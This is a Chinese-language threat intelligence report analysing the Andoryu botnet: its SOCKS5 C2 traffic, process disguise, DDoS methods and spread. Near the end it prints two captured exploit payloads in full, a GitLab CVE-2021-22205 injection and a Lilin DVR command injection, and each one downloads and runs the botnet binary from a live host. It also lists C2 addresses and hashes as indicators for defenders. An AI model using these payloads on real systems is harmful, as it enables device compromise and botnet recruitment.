Andoryu Botnet—基于Socks协议通信的新型僵尸网络

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

安全报告

Andoryu Botnet—基于Socks协议通信的新型僵尸网络

2023-02-22 11:26:42

所属地北京

概述

2023 年 2月初，奇安信威胁情报中心威胁监控系统监测到一起未知家族恶意样本利用CVE-2021-22205漏洞传播的事件，经过分析确认该样本不属于已知的僵尸网络家族。

通过样本编写者对其僵尸网络的命名，我们将此新型僵尸网络称为Andoryu Botnet，该新型僵尸网络通过Socks5协议与C2进行通信。

Andoryu Botnet 最近传播趋势如下，通过其活跃时间点我们得知Andoryu Botnet当前仅在样本进行更新迭代的时间点前后进行小范围传播，因此可以判断该僵尸网络还处于测试阶段： 1677031198_63f5771e2880261778f12.png!small?1677031198654

样本关键行为分析

本文以 x86-64 样本为例进行分析，样本信息：

文件名	文件大小	文件MD5
Andoryu.x86	42208 bytes	D203E1BB0BA3E8385FF9E1F83C10EB2D

运行参数判定

运行时会首先判断是否存在参数，当存有一个参数时样本才会正常运行： 1677031208_63f5772837e414702e076.png!small?1677031208835

字符串加密

样本中的大部分关键字符串加密，运行前期通过一个函数对所有加密的字符串进行批量解密：

1677034286_63f5832e41571d59db778.png!small?1677034287014

1677034299_63f5833be7873ecad878d.png!small?1677034300812

进程名伪装

使用 prctl 函数将进程名修改为 "/bin/bash"： 1677035848_63f5894810287794f14bb.png!small?1677035848612

打印僵尸网络信息

解密后的字符串中存在该僵尸网络信息，样本运行时将其打印到控制台： 1677035867_63f5895bf3027a17e55a6.png!small?1677035868803

由此命名该僵尸网络为Andoryu Botnet，并且可以了解到编写者测试样本的时间为2022年12月30日。

Socks5通信

通信过程

该僵尸网络通过socks协议进行通信，具体通信过程如下：

1. 首先连接硬编码的代理服务器，代理服务器地址为 "152.67.66.37:1080"。 1677035895_63f58977d470195449656.png!small?1677035896502

1677035909_63f589851eb637fdb374e.png!small?1677035909685

2. 与代理服务器成功三次握手后进行socks认证。 1677035923_63f5899339498265223e4.png!small?1677035924190

采用无用户密码认证的socks5代理： 1677035928_63f5899869df6903b2b09.png!small?1677035928894

3. 告知代理服务器需要访问哪个远程服务器，远程服务器地址批量解密时获取，DST_C2 = "172.86.123.20:1025"。 1677035943_63f589a70e5181b7839ba.png!small?1677035943789

4. socks通信，发送上线包。

上线包数据中包含本机IP信息： 1677035952_63f589b007e4c9e52dd07.png!small?1677035952543

1677035958_63f589b6b49992553e569.png!small?1677035959160

5. 通过代理接收C2下发指令。

奇安信威胁情报中心当前已监控到下发数据，但攻击者暂时还未发出DDoS攻击指令： 1677035980_63f589cc5be6c11f0320a.png!small?1677035980861

后续我们将持续对Andoryu Botnet进行跟踪并公布其最新动态。

DDoS方法

AndoryuBot支持多种DDoS方法，具体如下：

Name	Description
icmp-echo	ICMP Flood
udp-ovh	UDP Flood for OVH
udp-game	UDP Game Flood
udp-plain	UDP Plain Flood
tcp-raw	TCP Flood
tcp-socket	TCP Syn Flood
tcp-handshake	TCP Flood

样本更新及传播

通过对样本的关联分析，Andoryu Botnet更新始于2022年12月份，期间进行过两次更新迭代，更新时作者并未将样本中的输出测试时间进行修改，更新内容主要是DST_C2地址及支持的架构，最新版本AndoryuBot支持的CPU架构如下：

Arm
Mips
M68K
SuperH
Sparc
x86

Andoryu Botnet的传播方式除了CVE-2021-22205外，还通过Lilin DVR RCE进行扩散，本次发现的Payload如下：

CVE-2021-22205：

P(metadata
.(Copyright "\" . qx{TF=$(mktemp -u);mkfifo $TF && rm -rf Andoryu.10wget;wget http://47.87.154.192/Andoryu.x86 -O Andoryu.10wget;chmod 777 Andoryu.10wget;./Andoryu.10wget gitlab.x86;rm -rf Andoryu.10wget;<$TF | sh 1>$TF} . \" b ") )

Lilin DVR RCE：

User-Agent: Abcd
<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520"><SetConfiguration File="service.xml"><![CDATA[<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520"><Service><NTP Enable="True" Interval="20000" Server="time.nist.gov&cd /tmp;wget -O- http://47.87.154.192/lillin|sh;echo DONE"/></Service></DVR>]]></SetConfiguration></DVR>

IoCs

MD5:

D203E1BB0BA3E8385FF9E1F83C10EB2D

28F10E60D05018E6D28B79F0976A8542

F9018E4401116435DCFE2DC9D14D0FD5

2BABAF24B23872749EEC1452D7E7C0F3

ABD2496C3B703BD722386A848CC0BC12

6335ECB85ED6C6FCCF71FD841939BEC4

70A568C47785A8C58AA1D755EFE0E39E

FFE05160D769F441EF4A67271F9E614C

BB7DECCC2F6CEB2D5A5C7F5A05A4BBB1

0A1B14C2B8A453323841431FA44D0E32

C9CE8E0A1B13CBB6719133AFE5988CA7

C&C:

152.67.66.37:1080

172.86.123.20: 1025

104.234.239.190:1025

# 僵尸网络

本文为独立观点，未经允许不得转载，授权请联系FreeBuf客服小蜜蜂，微信：freebee2022

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多